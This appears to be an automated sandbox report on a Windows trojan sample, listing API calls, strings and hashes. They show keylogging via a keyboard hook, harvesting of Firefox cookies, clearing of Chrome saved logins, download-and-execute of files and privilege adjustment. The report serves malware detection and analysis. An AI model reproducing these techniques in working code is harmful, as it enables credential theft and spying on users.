• API String ID: 3587775597-0
• Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
• Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
• Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
• Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A

APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
• FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
• FindClose.KERNEL32(00000000), ref: 0040C4B8
• FindClose.KERNEL32(00000000), ref: 0040C4E3
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 1164774033-405221262
• Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
• Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
• Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
• Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D

APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
• DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
• GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
• FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
• FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
• Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
• Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
• Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
• Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58

APIs
• FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
• FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
  • Part of subcall function 0041C516: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: File$Find$CreateFirstNext
• String ID: 8SG$PXG$PXG$NG$PG
• API String ID: 341183262-3812160132
• Opcode ID: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
• Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
• Opcode Fuzzy Hash: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
• Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• GetLastError.KERNEL32 ref: 0040A328
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
• TranslateMessage.USER32(?), ref: 0040A385
• DispatchMessageA.USER32(?), ref: 0040A390
Strings
• Keylogger initialization failure: error , xrefs: 0040A33C
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error
• API String ID: 3219506041-952744263
• Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
• Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
• Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
• Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

APIs
• GetForegroundWindow.USER32 ref: 0040A451
• GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
• GetKeyboardLayout.USER32(00000000), ref: 0040A464
• GetKeyState.USER32(00000010), ref: 0040A46E
• GetKeyboardState.USER32(?), ref: 0040A479
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID:
• API String ID: 1888522110-0
• Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
• Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
• Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
• Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6

APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
• GetProcAddress.KERNEL32(00000000), ref: 004142AC
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984
• Opcode ID: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
• Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
• Opcode Fuzzy Hash: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
• Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                                • API String ID: 1589313981-2876530381
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
• InternetCloseHandle.WININET(00000000), ref: 0041B4AD
• InternetCloseHandle.WININET(00000000), ref: 0041B4B0
Strings
• http://geoplugin.net/json.gp, xrefs: 0041B448
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
• GetLastError.KERNEL32 ref: 0040BA93
Strings
• UserProfile, xrefs: 0040BA59
• [Chrome StoredLogins not found], xrefs: 0040BAAD
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
• [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
• OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
• GetLastError.KERNEL32 ref: 004179D8
Strings
Yara matches
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
APIs
• __EH_prolog.LIBCMT ref: 00409293
  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
• FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
• FindClose.KERNEL32(00000000), ref: 004093FC
  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
  • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
  • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
• FindClose.KERNEL32(00000000), ref: 004095F4
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
Yara matches
Similarity
• API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
• String ID:
• API String ID: 1824512719-0
Strings
Yara matches
Similarity
• API ID:
• String ID: FSE$FSE$PkGNG
• API String ID: 0-1266307253
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
APIs
  • Part of subcall function 00413584: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
  • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
  • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
• Sleep.KERNEL32(00000BB8), ref: 0040F896
• ExitProcess.KERNEL32 ref: 0040F905
Strings
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 5.1.3 Pro$override$pth_unenc
• API String ID: 2281282204-1392497409
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00452555
• GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0045257E
• GetACP.KERNEL32 ref: 00452593
Strings
Yara matches
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
                                                                                                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                                                APIs
                                                                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                                                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                • String ID: SETTINGS
                                                                                                                                                • API String ID: 3473537107-594951305
                                                                                                                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1157919129-0
                                                                                                                                                • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                                                                                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                                                                • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                                                                                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 0045279C
                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0045286D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 745075371-0
                                                                                                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1771804793-0
                                                                                                                                                • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                                                                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                                                                • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                                                                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                                                                APIs
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                                                                • String ID: C:\Users\user\Desktop\LdSbZG1iH6.exe$open
                                                                                                                                                • API String ID: 2825088817-2965086157
                                                                                                                                                • Opcode ID: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                                                                                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                                                                • Opcode Fuzzy Hash: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                                                                                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                                                                • String ID: XPG$XPG
                                                                                                                                                • API String ID: 4113138495-1962359302
                                                                                                                                                • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                                                                                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                                                                                • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                                                                                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                                                                                APIs
                                                                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                                                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNELBASE(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                                                                                                                  • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                • API String ID: 4127273184-3576401099
                                                                                                                                                • Opcode ID: 151fde30394074386c3475a809e11d1a6336c1573d3ef2cd27d1ca554eb4e09d
                                                                                                                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                                                                • Opcode Fuzzy Hash: 151fde30394074386c3475a809e11d1a6336c1573d3ef2cd27d1ca554eb4e09d
                                                                                                                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                                                                APIs
                                                                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                                                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNELBASE(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                                                                                                                  • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                • API String ID: 4127273184-3576401099
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• IsValidCodePage.KERNEL32(00000000), ref: 00451E3A
• _wcschr.LIBVCRUNTIME ref: 00451ECA
• _wcschr.LIBVCRUNTIME ref: 00451ED8
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451F7B
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
APIs
• _free.LIBCMT ref: 0044943D
  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
